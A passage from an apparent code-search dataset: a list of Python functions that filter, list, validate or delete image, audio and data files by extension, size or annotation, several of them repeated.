[ "def filterImages(files, cfg):\r\n regex = \"\\.(\" + \"|\".join(cfg.image_formats) + \")$\"\r\n #filter(lambda s: re.match(regex, s), files)\r\n return [s for s in files if re.findall(regex, s)]", "def filter_bad_names(self, images):\r\n good_images = []\r\n for image in images:\r\n if self.is_valid_filename(image):\r\n good_images.append(image)\r\n return good_images if len(good_images) > 0 else None", "def filelist_cleaner(lista, dataset=''):\n if dataset == 'ncar':\n cleaned = [ l for l in lista if '.nc' not in l ]\n if dataset == 'bufr':\n cleaned = [ l for l in lista if '.bfr' in l ]\n if 'era5' in dataset:\n cleaned = [ l for l in lista if '.nc' not in l and '.conv.' in l ]\n else:\n cleaned = lista\n \n return cleaned", "def check_files(self):\n for f in self.filenames:\n img = cv2.imread(f, int(self.color))\n if img is None:\n os.remove(f)", "def filterAudioFilesFromFilelist(filelist):\n audioFileList = []\n for audioFilter in filelist:\n audioRoot, audioExt = os.path.splitext(audioFilter)\n if audioExt in ['.wav', '.aiff', '.aif']:\n audioFileList.append(audioFilter)\n # end for loop\n return audioFileList", "def check_files(self):\n print('checking files')\n for f in self.filenames:\n img = cv2.imread(f, int(self.color))\n if img is None:\n os.remove(f)", "def filter_images(self, images):\n status = self.day_or_night(images[0][1],\n self.gray_refs['day'][0],\n self.gray_refs['night'][0])\n print status\n exclusions = self.gray_refs[status]\n threshold = 0.7\n last_ref = None\n result = []\n\n for filename, gray_img, raw_img in images:\n skip = False\n if last_ref:\n dist = ssim(gray_img, exclusions[last_ref], multichannel=False)\n if dist > threshold:\n skip = True\n\n if not skip:\n for i, gray_ref in enumerate(exclusions):\n if i == last_ref:\n continue\n dist = ssim(gray_img, gray_ref, multichannel=False)\n if dist > threshold:\n skip = True\n last_ref = i\n break\n\n if not skip:\n if (time.time() - self.last_notify) > notify_thresh:\n send_alert('Alert! Motion detected near front door.')\n self.last_notify = time.time()\n result.append((filename, gray_img, raw_img))\n return result", "def FilterLogfiles(files):\n log_files = list(files)\n for file_path in files:\n file_name = os.path.basename(file_path)\n if file_name == _KERNEL or file_name.endswith(_IMG_FILE_EXTENSION):\n log_files.remove(file_path)\n return log_files", "def checkLists(original_list, path, prefix, suffix):\n\n new_list = []\n for image in original_list:\n image = image.strip()\n if os.path.exists(path+'/'+prefix+image+suffix):\n new_list.append(image)\n else:\n logging.info('\\n' + str(image)+ '.fits not being processed due to error in image.\\n')\n logging.info(\"\\n#####################################################################\")\n logging.info(\"#####################################################################\")\n logging.info(\"\")\n logging.info(\" WARNING: \" + str(image) + \" .fits was removed from a list after a checkLists call.\")\n logging.info(\" An iraf task may have failed. 
\")\n logging.info(\"\")\n logging.info(\"#####################################################################\")\n logging.info(\"#####################################################################\\n\")\n\n\n pass\n\n return new_list", "def _filtering_photos(queue):\n\n while True:\n # Retrieves one list from the queue and splits the list.\n data = queue.get()\n picture = data[0]\n curdir = data[1]\n\n picture_name = basename(picture)\n\n # Filters the image.\n Filter(picture, join(curdir, \"filtered\"))", "def _process_image_files(self, input_files):\n # Handle single file-object as arg.\n if not isinstance(input_files, list):\n input_files = [input_files]\n self._check_batch_size(input_files)\n # Handle unnames images as lists of file objects. Named by index in list.\n image_files = []\n for i, tup in enumerate(input_files):\n if not isinstance(tup, tuple):\n image_files.append((tup, str(i)))\n assert hasattr(image_files[i][0], 'read'), (\n 'image_files[%d] has wrong type: %s. Must be file-object with read method.') % (\n i, type(image_files[i][0]))\n else: # already tuples passed in.\n image_files.append(tup)\n # Resize any images such that the min dimension is in range.\n if CAN_RESIZE:\n for i, image_tup in enumerate(image_files):\n image_files[i] = self._resize_image_tuple(image_tup)\n # Return a list of (bytes, name) tuples of the encoded image bytes.\n image_data = []\n for image_file in image_files:\n image_data.append((bytes(image_file[0].read()), image_file[1]))\n return image_data", "def _filter_file_list(files, local_metadata, remote_metadata):\n def _is_tracked(filename, metadata):\n \"\"\"\n Is the filename tracked in the remote metadata dict.\n The file may be not even locally tracked yet\n \"\"\"\n current_local_sha = local_metadata.get(filename, None)\n current_remote_sha = metadata.get(filename, None)\n return current_local_sha is not None \\\n and current_remote_sha is not None \\\n and current_local_sha == current_remote_sha\n\n def _is_inside_ignored_dir(filename):\n \"\"\" Is the filename inside any of the IGNORE_DIRS list \"\"\"\n ignore_dirs = ['./' + x for x in IGNORE_DIRS]\n return any([filename.startswith(x) for x in ignore_dirs])\n\n def _has_ignored_extension(filename):\n return any([ext in IGNORE_EXTENSIONS\n for ext in filename.split('.')[1:]])\n\n files = [f for f in files\n if not _is_inside_ignored_dir(f)\n and not _has_ignored_extension(f)\n and not _is_tracked(f, remote_metadata)]\n return files", "def filter_list(to_process_list):\n log_file_list = [file for file in to_process_list if \"tar\" not in file]\n tar_file_list = [file for file in to_process_list if \"tar\" in file]\n return log_file_list, tar_file_list", "def filter_target_extensions(self, files_dict):\n files_filtered = defaultdict(list)\n supported_formats = self.sox_get_supported_formats()\n logging.info('Filtering audio files ...')\n paths = list(files_dict.keys())\n\n for path in paths:\n if not path.endswith('letmehear'):\n files = sorted(files_dict[path])\n for f in files:\n if os.path.splitext(f)[1].lstrip('.').lower() in supported_formats:\n files_filtered[path].append(f)\n return files_filtered", "def images_media_filter(hash_str, mime_type):\n return mime_type in MIME_TO_EXTESION_MAPPING", "def check_files(self):\n print('checking files')\n for f in tqdm(self.filenames):\n img = cv2.imread(f, int(self.color))\n if img is None:\n os.remove(f)", "def filter_thumbnail_only(_list):\n result = list()\n for count, href in enumerate(_list):\n if count > 15:\n break\n if 
get_verified_response(get_thumbnail(href)).status == 200:\n result.append(href)\n return result", "def remove_unactionable_images(data):\n os.makedirs(os.path.join(data, 'removed'), exist_ok=True)\n for product in os.listdir(data):\n if product.startswith('product') is False:\n continue\n path = os.path.join(data, product)\n if os.path.isdir(path) is False:\n continue\n if is_useful(path, 0.5) is False:\n print('\\tRemoving ' + path)\n shutil.copy(os.path.join(path, 'TCI.tiff'),\n os.path.join(data, 'removed', product + '.tiff'))\n shutil.rmtree(path)\n else:\n shutil.copy(os.path.join(path, 'TCI.tiff'),\n os.path.join(data, product + '.tiff'))", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n for i, img_info in enumerate(self.img_infos):\n # Filter out empty images\n if img_info['ann']['bboxes'].shape[0] > 0:\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def get_filtered_file_names_list(_file_names_list, _gender=None, _noise=None, _scale=None):\n _file_names_split_list = [re.split('[/_]+', fname) for fname in _file_names_list]\n\n if _gender:\n if type(_gender) == str:\n _gender = [_gender]\n _file_names_split_list = [f_name for f_name in _file_names_split_list if f_name[-3] in _gender]\n\n if _noise:\n if type(_noise) == str:\n _noise = [_noise]\n _file_names_split_list = [f_name for f_name in _file_names_split_list if f_name[-2] in _noise]\n\n if _scale:\n if type(_scale) == str:\n _scale = [_scale]\n _file_names_split_list = [f_name for f_name in _file_names_split_list if f_name[-1] in _scale]\n\n _file_names_list = ['_'.join(['/'.join(fname_split[:3]), fname_split[-2], fname_split[-1]])\n for fname_split in _file_names_split_list]\n\n return _file_names_list", "def make_image_list(directory):\r\n\tonly_files = [file for file in listdir(directory) if isfile(join(directory, file))]\r\n\treturn only_files", "def create_file_list(params):\n data_dir = params.get('data_dir', '')\n params['file_list'] = \".tmp.txt\"\n imgtype_list = {'jpg', 'bmp', 'png', 'jpeg', 'rgb', 'tif', 'tiff'}\n with open(params['file_list'], \"w\") as fout:\n tmp_file_list = os.listdir(data_dir)\n for file_name in tmp_file_list:\n file_path = os.path.join(data_dir, file_name)\n if imghdr.what(file_path) not in imgtype_list:\n continue\n fout.write(file_name + \" 0\" + \"\\n\")", "def __clean(path, pattern = '.tiff'):\n for f in os.listdir(path):\n if re.search(pattern, f):\n os.remove(os.path.join(path, f))\n\n print(\"directory cleaned\")", "def filter_images(history, whitelist):\n docker_client = docker.client.APIClient()\n local_images = common.get_local_images(docker_client)\n approved_images = set(local_images) - set(whitelist)\n return {image: timestamp for image, timestamp in history.items() if image in approved_images}", "def _filter_imgs(self, min_size=32):\r\n valid_inds = []\r\n ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())\r\n for i, img_info in enumerate(self.img_infos):\r\n if self.filter_empty_gt and self.img_ids[i] not in ids_with_ann:\r\n continue\r\n if min(img_info['width'], img_info['height']) >= min_size:\r\n valid_inds.append(i)\r\n return valid_inds", "def collect_image_files():\n negs = [] # Non image files found\n for filename in os.listdir('.'):\n if filename.lower().endswith('.jpg') or filename.lower().\\\n endswith('.jpeg'):\n jpg_files.append(filename)\n elif filename.lower().endswith('.gif'):\n gif_files.append(filename)\n elif filename.lower().endswith('.png'):\n png_files.append(filename)\n 
else:\n negs.append(filename)\n return negs", "def _filter_imgs(self, min_size=32):\n\n valid_inds = []\n for i, img_info in enumerate(self.data_infos):\n if min(img_info[\"width\"], img_info[\"height\"]) < min_size:\n continue\n if self.filter_empty_gt and len(img_info[\"ann\"][\"bboxes\"]) > 0:\n valid_inds.append(i)\n else:\n valid_inds.append(i)\n\n return valid_inds", "def filterFiles(groupDict, fileList):\n for fl in fileList:\n cleanFile = cleanUpPath(fl)\n dirsList = PurePath(fl).parts\n try:\n # Find the first libs directory.\n index = dirsList.index(\"libs\")\n # Any child of libs directory is a group.\n grp = dirsList[index + 1]\n groupDict[grp].append(cleanFile)\n except ValueError:\n groupDict[GRP_UNFILTERED].append(cleanFile)", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n for i, img_info in enumerate(self.img_infos):\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n for i, img_info in enumerate(self.img_infos):\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def swarpfilter(d, dir, directory, images, keys, filter, lamp, camera, done, output, type):\n filt = images.files_filtered(FWINAME=filter, FLSPECTR=lamp, CAMNAME=camera, HISTORY=done)\n files = [d + x for x in filt.tolist()]\n print(files)\n if files:\n swarp(files, output=directory + '/' + output + '.fits', celestial_type=type)", "def _filter_mrpack_files(file_list: List[MrpackFile], mrpack_install_options: MrpackInstallOptions) -> List[MrpackFile]:\n filtered_list: List[MrpackFile] = []\n for file in file_list:\n if \"env\" not in file:\n filtered_list.append(file)\n continue\n\n if file[\"env\"][\"client\"] == \"required\":\n filtered_list.append(file)\n if file[\"env\"][\"client\"] == \"optional\" and file[\"path\"] in mrpack_install_options.get(\"optionalFiles\", []):\n filtered_list.append(file)\n\n return filtered_list", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())\n for i, img_info in enumerate(self.img_infos):\n if self.img_ids[i] not in ids_with_ann:\n continue\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())\n for i, img_info in enumerate(self.img_infos):\n if self.img_ids[i] not in ids_with_ann:\n continue\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())\n for i, img_info in enumerate(self.img_infos):\n if self.img_ids[i] not in ids_with_ann:\n continue\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def find_all_images_in_folder(path_to_folder):\n import os, os.path\n \n imgs = [] \n valid_images = [\".jpg\",\".gif\",\".png\",\".jpeg\"]\n for f in os.listdir(path_to_folder):\n pre,ext = os.path.splitext(f) \n if(ext.lower() in valid_images) and not (pre.endswith(\"thumbnail\")):\n #imgs.append( [os.path.join(path_to_folder,pre),ext] )\n imgs.append( [pre ,ext] )\n return imgs", "def default_filter(files):\n\n if '1.mkv' in files and '2.mkv' in files and 'Labels.json' in files:\n return True\n\n return False", "def find_uglies():\n 
for file_type in ['neg']:\n for img in os.listdir(file_type):\n for ugly in os.listdir('uglies'):\n try:\n current_image_path = str(file_type) + '/'+str(img)\n ugly = cv2.imread('uglies/' + str(ugly))\n question = cv2.imread(current_image_path)\n if ugly.shape == question.shape and not(np.bitwise_xor(ugly, question).any()):\n print('That is one ugly pic! Deleting!')\n print(current_image_path)\n os.remove(current_image_path)\n except Exception as e:\n print(str(e))", "def space_cleaning():\n for file in os.listdir(\".\"):\n if file.endswith(\".png\"):\n os.remove(file)", "def filters(im, filter_list=[\"MedianFilter\"]):\n out = im\n for filter_name in filter_list:\n out = out.filter(getattr(ImageFilter, filter_name))\n return out", "def get_filtered_list_without_temporary_files(self, file_list=None):\n\t\ttemp_file_regex = re.compile(r'.*\\~\\$.*')\n\t\ttry:\n\t\t\ttemporary_files = list(filter(temp_file_regex.search, file_list))\n\t\t\tfiles_filtered = list(set(file_list) - set(temporary_files))\n\t\t\treturn files_filtered\n\t\texcept:\n\t\t\treturn file_list", "def clean_filelist(fnlist):\n cntClean = 0\n for fn in fnlist:\n try:\n with h5py.File(fn,\n 'r+') as handle: # ref: https://docs.h5py.org/en/stable/high/file.html?highlight=h5py.File#h5py.File\n if args.groupName in list(handle.keys()): # clean if found any group named 'Analyses'\n del handle[args.groupName]\n cntClean += 1\n except: ## avoid corrupted fast5 files\n pass\n return cntClean", "def negative_filtering(patterns: list, file_list):\n if len(patterns) == 0:\n return file_list\n prog = re.compile(patterns.pop())\n it = (i for i in file_list if not prog.search(i))\n return negative_filtering(patterns, it)", "def _filter_files(file_dir: Union[str, Path], is_viya4: Optional[bool] = False) -> list:\n file_names = []\n file_names.extend(sorted(Path(file_dir).glob(\"*.json\")))\n if is_viya4:\n file_names.extend(sorted(Path(file_dir).glob(\"score_*.py\")))\n file_names.extend(sorted(Path(file_dir).glob(\"*.pickle\")))\n # Include H2O.ai MOJO files\n file_names.extend(sorted(Path(file_dir).glob(\"*.mojo\")))\n if file_names:\n return file_names\n else:\n raise FileNotFoundError(\n \"No valid model files were found in the provided file directory.\"\n )", "def test_invalid_prompt_files(self):\n invalid_files = [\n \"p01.txt\",\n \"abc.txt\",\n \"p000001s000001.mp3\",\n \"p000001s000001n001.txt\",\n \"u000001.txt\"\n ]\n filtered_files = list(filter(format.is_prompt_file, invalid_files))\n\n assert len(filtered_files) == 0", "def test_files_from_plate():\n plate_path = os.path.join(TEST_PATH_IX, \"test-plate-1\")\n output = filelister_ix.files_from_plate(plate_path)\n assert len(output) > 0\n for f in output:\n assert f.endswith(\".tif\")", "def get_good(filenames, good=True):\n return filter_filenames(filenames, [\"good\"], not good)", "def get_lst_images(file_path):\n return [i for i in os.listdir(file_path) if i != '.DS_Store']", "def compress_to_tiffs(source, remove_old_files):\n os.chdir(source)\n subprocess.Popen(\"i_view32.exe *.bmp /tifc=5 /convert=*.tif\", shell=True,\n stdout=subprocess.PIPE, env={'PATH': os.getenv('PATH')}).stdout.read()\n if remove_old_files == 'yes':\n list_of_files_in_the_folder = os.listdir(source)\n for files in list_of_files_in_the_folder:\n name, ext = os.path.splitext(files)\n if ext.lower() == \".bmp\":\n os.remove(os.path.join(source, files))", "def CollectImageFilenames(self):\n # Match all image extensions but not the filenmae of the of beamer pdf\n regex_img = re.compile(\n 
r'^(?!{}).*\\.(jpg|png|pdf)'.format(self._filename.replace('.tex', '')))\n # regex_img = re.compile(r'^(?!test)'.format(self._filename.replace('.tex', '')))\n files = [f for f in os.listdir(os.getcwd())\n if regex_img.search(f)]\n return files", "def _purge_except_yaml(self, list_files): \n yaml_files = []\n for filepath in list_files:\n if filepath.endswith(\".yaml\"):\n yaml_files.append(filepath)\n\n return yaml_files", "def clean_dir_filtered(dr, filters):\n # type: (path, List[str]) -> None\n for f in os.listdir(dr):\n for fltr in filters:\n if fltr in f:\n os.remove(f)\n continue", "def _identify_files_to_remove(self, job_result_filepaths, params):\r\n return []", "def _identify_files_to_remove(self, job_result_filepaths, params):\r\n return []", "def _identify_files_to_remove(self, job_result_filepaths, params):\r\n return []", "def get_exlusions(self):\n files = os.listdir(self.exclusions_path)\n for filename in files:\n image = cv2.imread(self.exclusions_path + filename)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21,21), 0)\n\n if filename.startswith('day'):\n self.gray_refs['day'].append(gray)\n elif filename.startswith('night'):\n self.gray_refs['night'].append(gray)", "def filename_filter ( self, filename, _fnmatch=fnmatch.fnmatch ):\n return all (\n not _fnmatch ( filename, pat ) for pat in self.FILENAMES_IGNORE\n )", "def preprocess_images(images_dir, image_dims, logger):\n find_str = images_dir + '/**/*.jpg'\n images = glob.glob(find_str, recursive=True)\n num_samples = get_num_samples(images_dir)\n\n # Load in the already processed file list\n proc_list_path = images_dir + '/processed_list.txt'\n if os.path.isfile(proc_list_path):\n with open(proc_list_path) as f:\n proc_list = f.read().split('\\n')\n else:\n proc_list = []\n \n i = 1\n for image in images:\n image_name = image.split('/')[-1]\n if image not in proc_list:\n logger.info(\"Processing %s\", \" {} - {}/{}\".format(\n image_name, i, num_samples))\n try:\n processed_image = ImageCheck.check_and_crop(image)\n except (ImageCheck.ObjectMissingError,\n ImageCheck.WormMissingError,\n ImageCheck.MultipleWormsError,\n ImageCheck.TooBlurryError) as e:\n logger.info(\"Processing Error: %s\",\n \"Image at: \\n{} \\n Produced error: {} \\n Removing\"\n \" image\".format(image, e))\n os.remove(image)\n i = i + 1\n continue\n cv2.imwrite(image, processed_image)\n with open(proc_list_path, 'a') as f:\n f.write(image + '\\n')\n else:\n logger.info(\"Skipping %s\", \" {} (already processed) - {}/{}\".format(\n image_name, i, num_samples))\n i = i + 1", "def checksImages(self):\n metadata=[]\n for image in self.meta['sources']:\n with rasterio.open(image) as src:\n metaData=src.meta\n \n assert metaData['driver'] == 'GTiff', \"Driver is not supported: {0}\".format(metaData['driver'])\n assert metaData['count'] == len(self.meta['bandNames']), \"Nbands incorrect, expected: {0}, {1} provided\".format(metaData['count'],len(self.meta['bandNames']))\n \n metadata.append({'dtype': metaData['dtype'], 'driver': metaData['driver'], 'nodata': metaData['nodata'], 'nBands': metaData['count'],'crs': src.crs.to_string()})\n \n assert len(set([item['dtype'] for item in metadata])) == 1, \"Images list dtypes aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['dtype'] for item in metadata])))\n assert len(set([item['driver'] for item in metadata])) == 1, \"Images list drivers aren't compatibles. 
Expected: 1, 1 provided\".format(metaData['count'],len(set([item['driver'] for item in metadata])))\n assert len(set([item['nodata'] for item in metadata])) == 1, \"Images list nodata values aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['nodata'] for item in metadata])))\n assert len(set([item['nBands'] for item in metadata])) == 1, \"Images list nBands number aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['nBands'] for item in metadata])))\n assert len(set([item['crs'] for item in metadata])) == 1, \"Images list crs aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['crs'] for item in metadata]))) \n return metadata[0]", "def raw_clean(delete, invert, raw_dir, trash, raw_ext):\n raw_image_ext = f\".{raw_ext.upper()}\"\n\n # Basic user input check\n if not os.path.exists(raw_dir):\n print(f\"No '{raw_dir}' directory found!\")\n sys.exit(1)\n\n # Get list of images in different formats\n image_dir = os.getcwd()\n raw_dir = os.path.abspath(raw_dir)\n\n jpgs = set(\n [f.split('.')[0]\n for f in os.listdir(image_dir) if f.endswith(COMP_IMAGE_EXT)]\n )\n raws = set(\n [f.split('.')[0]\n for f in os.listdir(raw_dir) if f.endswith(raw_image_ext)]\n )\n\n # Find missing pairs\n paired = raws & jpgs\n jpgs_without_raw = jpgs - paired\n raws_without_jpg = raws - paired\n\n # Decide what set of files to process\n if not invert:\n images = raws_without_jpg\n workdir = raw_dir\n ext = raw_image_ext\n else:\n images = jpgs_without_raw\n workdir = image_dir\n ext = COMP_IMAGE_EXT\n\n # Process files\n for image in images:\n image_path = os.path.join(workdir, f\"{image}{ext}\")\n if not trash and not delete:\n print(f\"No pair found for '{image_path}' \")\n elif delete:\n print(f\"Deleting '{image_path}'...\")\n os.unlink(image_path)\n elif trash:\n print(f\"Trashing '{image_path}'...\")\n send2trash.send2trash(image_path)", "def preprocessfolder(self):\n imgs, _ = getFilesAndHdf(str(self.in_directory.text()))\n self.img_list = sorted(imgs)\n self.updateImageGroups()", "def load_test_words():\n return [f.rstrip('.png\\n') for f in os.listdir(IMG_PATH) if\n ((os.path.splitext(f)[-1] == '.png') & (int(f[0:3]) > 304))]", "def filter_captured_urls(urls_files, url_list_file):\n captured_urls = load_captured_urls(url_list_file)\n \n to_capture = list(filter(lambda d: d['url'] not in captured_urls, urls_files))\n \n return to_capture", "def compress_list(src_list):\n return [item for item in src_list if item]", "def get_img_list(self):\n if self.list_flag == \"train\":\n train_list_all = [line.rstrip('\\n')[:-4] for line in open(os.path.join(self.dataset_dir, 'split', self.list_flag + '-list.txt'))]\n train_list_delete = [line.rstrip('\\n') for line in open(os.path.join(self.dataset_dir, 'split', 'Mesh_overlay_train_error_delete.txt'))]\n print(\"Train delete %d images\" % len(train_list_delete))\n\n self.img_list_all = [x for x in train_list_all if x not in train_list_delete]\n elif self.list_flag == \"val\":\n valid_list_all = [line.rstrip('\\n')[:-4] for line in open(os.path.join(self.dataset_dir, 'split', 'validation-list.txt'))]\n val_list_delete = [line.rstrip('\\n') for line in open(os.path.join(self.dataset_dir, 'split', 'Mesh_overlay_val_error_delete.txt'))]\n self.img_list_all = [x for x in valid_list_all if x not in val_list_delete]\n print(\"Val delete %d images.\" % len(val_list_delete))\n\n elif self.list_flag == 'test':\n im_list = os.listdir(os.path.join(self.dataset_dir, 
'images'))\n self.img_list_all = [x[:-4] for x in im_list]\n\n return self.img_list_all", "def missed_conversions(in_dir, out_dir, ignore_masks=False):\n in_paths = os.walk(in_dir)\n out_paths = os.walk(out_dir)\n missed = []\n for ((in_path, _, in_files), (_, _, out_files)) in \\\n zip(in_paths, out_paths):\n in_files = filter(is_cellomics_image, in_files)\n if ignore_masks:\n in_files = filter(lambda fn: not is_cellomics_mask(fn), in_files)\n in_files = sorted(in_files)\n out_files = set(out_files)\n for infn in in_files:\n outfn = infn[:-4] + '.tif'\n if outfn not in out_files:\n missed.append(os.path.join(in_path, infn))\n return missed", "def process_images():\n create_dirs()\n for root, dirs, files in os.walk(IN):\n for name in files:\n if name[0] == '.':\n continue\n process_image(name)", "def imgFiltering(inputPath, outputPath):\n\t# open the target image\n\tpollenImg = IJ.openImage(inputPath)\n\t\n\t# Create duplicator\n\tduplicator = Duplicator()\n\t\n\t# Duplicate the image with channel 1\n\tpollenImgCopy = duplicator.run(pollenImg, 1, 1, 1, 1, 1, 1);\n\t\n\t# set auto threshold\n\t# IJ.setAutoThreshold(pollenImgCopy, \"Default dark\");\n\t\n\t# set threshold\n\tIJ.setThreshold(pollenImgCopy, 17000, 65520)\n\t\n\t# Call the Thresholder to convert the image to a mask\n\tIJ.run(pollenImgCopy, \"Convert to Mask\", \"\")\n\t\n\t# create result table\n\trt = ResultsTable()\n\t\n\t# create particle analyzer\n\tpAnalyzer = ParticleAnalyzer(ParticleAnalyzer.SHOW_NONE, Measurements.ALL_STATS, rt, 20.0, 1000.0, 0.5 ,1.0)\n\t\n\t# Analyze the particle\n\tpAnalyzer.analyze(pollenImgCopy)\n\t\n\t# Save results as csv\n\trt.saveAs(outputPath)", "def test_filter_files(self):\n expected = [\n (\"/subdir1/fichier1\", False),\n (\"/subdir1/fichier4\", False),\n (\"/subdir1/subsubdir1\", False),\n ]\n files = [\n (\"/subdir1/fichier1\", False),\n (\"/subdir2/fichier2\", False),\n (\"/subdir2/fichier3\", False),\n (\"/subdir1/fichier4\", False),\n (\"/subdir1/subsubdir1/fichier1\", False),\n (\"/subdir1/subsubdir1/\", False),\n ]\n self.assertEqual(\n list(self.path_translator.filter_files(files, \"/subdir1\")),\n expected)", "def filter_img(img, new_img, f):\n\n datas = img.getdata()\n new_data = []\n for item in datas:\n if f(item[0]) and f(item[1]) and f(item[2]):\n new_data.append((0, 0, 0, 0))\n else:\n new_data.append(item)\n new_img.putdata(new_data)", "def filter(self):\n for f in FileHelper.ALL_PATHS:\n media_obj = MediaObject(FileHelper.get_url(f), FileHelper.get_title(f), FileHelper.get_media_type(f), FileHelper.get_icon(f), FileHelper.get_duration(f), FileHelper.get_ctype(f))\n _id = media_obj.uuid\n if media_obj.media_type == \"image\":\n DB.IMAGES[_id] = media_obj\n elif media_obj.media_type == \"audio\":\n DB.MUSIC[_id] = media_obj\n elif media_obj.media_type == \"video\":\n DB.VIDEOS[_id] = media_obj\n else:\n print \"File '%s' doesn't play nice.\" % (f)", "def ingest_latests(last_timestamp, file_list):\n def _iterator(file_name):\n # Is a radar image file\n if re.match(r'cag01est2400\\d{4}-\\d{2}-\\d{2}_\\d{2}:\\d{2}:\\d{2}.png', file_name):\n file_timestamp = datetime.datetime.strptime(\n file_name, 'cag01est2400%Y-%m-%d_%H:%M:%S.png')\n if file_timestamp > last_timestamp:\n return True\n else:\n return False\n else:\n return False\n\n return list(filter(_iterator, file_list))", "def list_all_image(path, valid_exts=VALID_IMAGE_EXTS):\n for filename in os.listdir(path):\n bname, ext = os.path.splitext(filename)\n if ext.lower() not in VALID_IMAGE_EXTS:\n continue\n filepath = 
os.path.join(path, filename)\n yield strutils.decode(filepath)", "def populate_image_lists():\r\n with os.scandir(os.path.join(dir_path, \"inputs\", \"type_a\")) as filepaths:\r\n for path in filepaths:\r\n extension = os.path.splitext(path)[1].lower()\r\n if extension == \".png\" or extension == \".jpg\":\r\n images_a.append(path.path)\r\n with os.scandir(os.path.join(dir_path, \"inputs\", \"type_b\")) as filepaths:\r\n for path in filepaths:\r\n extension = os.path.splitext(path)[1].lower()\r\n if extension == \".png\" or extension == \".jpg\":\r\n images_b.append(path.path)", "def ExcludeFiles(filters, files):\n if not filters:\n return files\n match = set()\n for file_filter in filters:\n excludes = set(fnmatch.filter(files, file_filter))\n match |= excludes\n return [name for name in files if name not in match]", "def filter(self, filters):", "def preselect(input_files: list) -> list:\n checked_files = []\n for file in input_files:\n if os.path.isfile(file):\n checked_files.append(file)\n\n summary_df = pd.DataFrame(columns=['file', 'size'])\n\n summary_df['file'] = checked_files\n summary_df['size'] = [os.path.getsize(file) for file in checked_files]\n\n summary_df = summary_df[summary_df['size'].duplicated(keep=False)]\n\n return summary_df['file'].tolist()", "def clean_file(filesnames_list, file_type): # so now not needed.\r\n global files_list\r\n files_list = []\r\n global ft_list\r\n ft_list = []\r\n for line in filesnames_list:\r\n s, fileType = line.split('.') # split off file_type here\r\n print(s)\r\n files_list.append(s)\r\n ft_list.append(fileType)\r\n print(files_list)\r\n return (files_list)", "def filter_filenames(filenames, filters, inverse=False):\n out = []\n for filename in filenames:\n for filt in filters:\n if (filt not in filename) + (inverse) == 1:\n break\n else:\n out.append(filename)\n return out", "def extract_microfossils_in_dir(source_dir, destination_dir,\n crop_dims, min_microfossil_size, clean_particles):\n if os.path.isdir(source_dir) is False:\n raise Exception(\"Not a valid source path\")\n if os.path.isdir(destination_dir) is False:\n os.makedirs(destination_dir)\n\n print(\"Currently processing images in dir: {}\".format(source_dir))\n image_extensions = [\".tif\", \".TIF\", \".png\", \".PNG\"]\n sub_dirs = []\n images_in_dir = []\n for file in os.listdir(source_dir):\n if os.path.isdir(os.path.join(source_dir, file)) and os.path.join(source_dir, file) != destination_dir:\n sub_dirs.append(file)\n # If it's an image with the given extensions\n elif reduce((lambda x, y: x or y), [file.endswith(ext) for ext in image_extensions]):\n images_in_dir.append(file)\n\n # Now process the images\n processed_images = 0\n generated_crops = 0\n for image_path in images_in_dir:\n full_image_path = os.path.join(source_dir, image_path)\n grayscale_image = cv2.imread(full_image_path, cv2.IMREAD_GRAYSCALE)\n if grayscale_image is None:\n print(\"Couldn't read image and was skipped: {}\".format(full_image_path))\n continue\n\n unfiltered_crops, filtered_crops = extract_microfossils(grayscale_image, min_microfossil_size,\n crop_dims, clean_particles)\n processed_images += 1\n for idx, crop in enumerate(unfiltered_crops):\n crop_file_name = \"{}_crop_{}_unfiltered.png\".format(os.path.splitext(image_path)[0], idx)\n cv2.imwrite(os.path.join(destination_dir, crop_file_name), crop)\n for idx, crop in enumerate(filtered_crops):\n crop_file_name = \"{}_crop_{}_filtered.png\".format(os.path.splitext(image_path)[0], idx)\n cv2.imwrite(os.path.join(destination_dir, 
crop_file_name), crop)\n\n generated_crops += len(unfiltered_crops) + len(filtered_crops)\n\n # Recursively apply to all subdirs\n for subdir in sub_dirs:\n source_subdir = os.path.join(source_dir, subdir)\n destination_subdir = os.path.join(destination_dir, subdir)\n sub_processed_images, sub_generated_crops = extract_microfossils_in_dir(source_subdir, destination_subdir,\n crop_dims, min_microfossil_size, clean_particles)\n processed_images += sub_processed_images\n generated_crops += sub_generated_crops\n\n return processed_images, generated_crops", "def filter_valid_data(image_dir, anno_path):\n images = []\n image_path_dict = {}\n image_anno_dict = {}\n if not os.path.isdir(image_dir):\n raise RuntimeError(\"Path given is not valid.\")\n if not os.path.isfile(anno_path):\n raise RuntimeError(\"Annotation file is not valid.\")\n\n with open(anno_path, \"rb\") as f:\n lines = f.readlines()\n for img_id, line in enumerate(lines):\n line_str = line.decode(\"utf-8\").strip()\n line_split = str(line_str).split(' ')\n file_name = line_split[0]\n image_path = os.path.join(image_dir, file_name)\n if os.path.isfile(image_path):\n images.append(img_id)\n image_path_dict[img_id] = image_path\n image_anno_dict[img_id] = anno_parser(line_split[1:])\n\n return images, image_path_dict, image_anno_dict", "def list_image_files(dir, filter=None):\n for entry in os.listdir(dir):\n path = os.path.join(dir, entry)\n if os.path.isdir(path):\n for p in list_image_files(path, 